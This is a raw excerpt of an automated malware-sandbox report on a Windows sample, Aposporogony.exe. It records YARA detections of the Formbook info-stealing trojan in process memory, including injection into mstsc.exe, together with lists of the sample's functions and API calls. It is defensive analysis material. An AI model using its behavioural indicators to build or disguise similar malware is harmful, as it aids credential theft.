      Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49818 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49819 version: TLS 1.2
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040558F

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 00000004.00000002.2220881682.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000000.2167661567.000000000076B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.6580637298.0000000004320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000000.2175496471.000000000076B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2239453620.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.6580116972.00000000042F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Source: 00000004.00000002.2220881682.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000004.00000002.2220881682.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.2220881682.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000005.00000000.2167661567.000000000076B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000000.2167661567.000000000076B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000000.2167661567.000000000076B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000006.00000002.6580637298.0000000004320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.6580637298.0000000004320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.6580637298.0000000004320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000005.00000000.2175496471.000000000076B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000000.2175496471.000000000076B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000000.2175496471.000000000076B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000004.00000002.2239453620.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000004.00000002.2239453620.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000004.00000002.2239453620.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000006.00000002.6580116972.00000000042F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000006.00000002.6580116972.00000000042F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000006.00000002.6580116972.00000000042F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: Aposporogony.exe PID: 6960, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: mstsc.exe PID: 7384, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Aposporogony.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: 00000004.00000002.2220881682.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000004.00000002.2220881682.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.2220881682.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000005.00000000.2167661567.000000000076B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000000.2167661567.000000000076B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000000.2167661567.000000000076B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000006.00000002.6580637298.0000000004320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.6580637298.0000000004320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.6580637298.0000000004320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000005.00000000.2175496471.000000000076B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000000.2175496471.000000000076B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000000.2175496471.000000000076B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000004.00000002.2239453620.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000004.00000002.2239453620.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000004.00000002.2239453620.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000006.00000002.6580116972.00000000042F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000006.00000002.6580116972.00000000042F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000006.00000002.6580116972.00000000042F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: Aposporogony.exe PID: 6960, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: mstsc.exe PID: 7384, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
      Source: C:\Users\user\Desktop\Aposporogony.exeFile created: C:\Windows\resources\0409Jump to behavior
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_00404DCC0_2_00404DCC
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_00406AF20_2_00406AF2
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_73D21B630_2_73D21B63
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034803480_2_03480348
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034A0F450_2_034A0F45
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03481F5D0_2_03481F5D
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034813540_2_03481354
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_0348236B0_2_0348236B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03480F7B0_2_03480F7B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03480B710_2_03480B71
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03480F770_2_03480F77
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03480B0E0_2_03480B0E
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03481F060_2_03481F06
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_0348071B0_2_0348071B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_0348971D0_2_0348971D
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03487B330_2_03487B33
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034A2BCE0_2_034A2BCE
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03480FCE0_2_03480FCE
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034813D20_2_034813D2
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03480BE60_2_03480BE6
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034A3FF10_2_034A3FF1
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03489B9B0_2_03489B9B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034807970_2_03480797
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034803BD0_2_034803BD
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03481FB30_2_03481FB3
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03481E4D0_2_03481E4D
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_0348065F0_2_0348065F
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034812610_2_03481261
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03480A080_2_03480A08
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03488A0E0_2_03488A0E
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03480E1B0_2_03480E1B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03480E1F0_2_03480E1F
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034802160_2_03480216
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03487E200_2_03487E20
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034826230_2_03482623
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034822330_2_03482233
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034A52CD0_2_034A52CD
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034826D80_2_034826D8
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034826D00_2_034826D0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034812D40_2_034812D4
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034802EE0_2_034802EE
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03480AEF0_2_03480AEF
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03480EF80_2_03480EF8
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034806FA0_2_034806FA
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03480E980_2_03480E98
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03481EAB0_2_03481EAB
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034886A50_2_034886A5
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03480D520_2_03480D52
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034A59540_2_034A5954
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034821630_2_03482163
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_0348257C0_2_0348257C
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034889010_2_03488901
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034825020_2_03482502
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034A151A0_2_034A151A
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03481D100_2_03481D10
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034879100_2_03487910
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034825210_2_03482521
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034879270_2_03487927
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034889370_2_03488937
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034899C90_2_034899C9
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034801CA0_2_034801CA
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034A2DD80_2_034A2DD8
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034821DB0_2_034821DB
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034825D10_2_034825D1
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034805EC0_2_034805EC
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034811ED0_2_034811ED
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03481DE50_2_03481DE5
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03487D810_2_03487D81
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034809AD0_2_034809AD
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03480DB60_2_03480DB6
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034899B70_2_034899B7
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03480C590_2_03480C59
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_0348006D0_2_0348006D
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_0348906F0_2_0348906F
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034800020_2_03480002
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_0348081A0_2_0348081A
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034800120_2_03480012
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034830120_2_03483012
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034830290_2_03483029
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_0348142B0_2_0348142B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_0348042D0_2_0348042D
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034820320_2_03482032
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_03480CD20_2_03480CD2
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034810E90_2_034810E9
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034804FE0_2_034804FE
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034820F10_2_034820F1
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034808860_2_03480886
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034820910_2_03482091
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034810920_2_03481092
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034804930_2_03480493
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_034898AD0_2_034898AD
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D862DB04_2_1D862DB0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D859DD04_2_1D859DD0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8EFDF44_2_1D8EFDF4
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84AD004_2_1D84AD00
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D90FD274_2_1D90FD27
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D907D4C4_2_1D907D4C
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D850D694_2_1D850D69
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8E9C984_2_1D8E9C98
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D868CDF4_2_1D868CDF
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8D7CE84_2_1D8D7CE8
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86FCE04_2_1D86FCE0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D840C124_2_1D840C12
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D85AC204_2_1D85AC20
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8CEC204_2_1D8CEC20
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FEC4C4_2_1D8FEC4C
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D90EC604_2_1D90EC60
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D906C694_2_1D906C69
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D90EFBF4_2_1D90EFBF
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D901FC64_2_1D901FC6
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D85CF004_2_1D85CF00
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D90FF634_2_1D90FF63
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D851EB24_2_1D851EB2
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D900EAD4_2_1D900EAD
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D909ED24_2_1D909ED2
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D842EE84_2_1D842EE8
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D892E484_2_1D892E48
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D870E504_2_1D870E50
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84E9A04_2_1D84E9A0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D90E9A64_2_1D90E9A6
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8959C04_2_1D8959C0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8199E84_2_1D8199E8
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8668824_2_1D866882
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C98B24_2_1D8C98B2
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8528C04_2_1D8528C0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D9018DA4_2_1D9018DA
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D9078F34_2_1D9078F3
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8538004_2_1D853800
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87E8104_2_1D87E810
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D90F8724_2_1D90F872
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8368684_2_1D836868
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8598704_2_1D859870
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86B8704_2_1D86B870
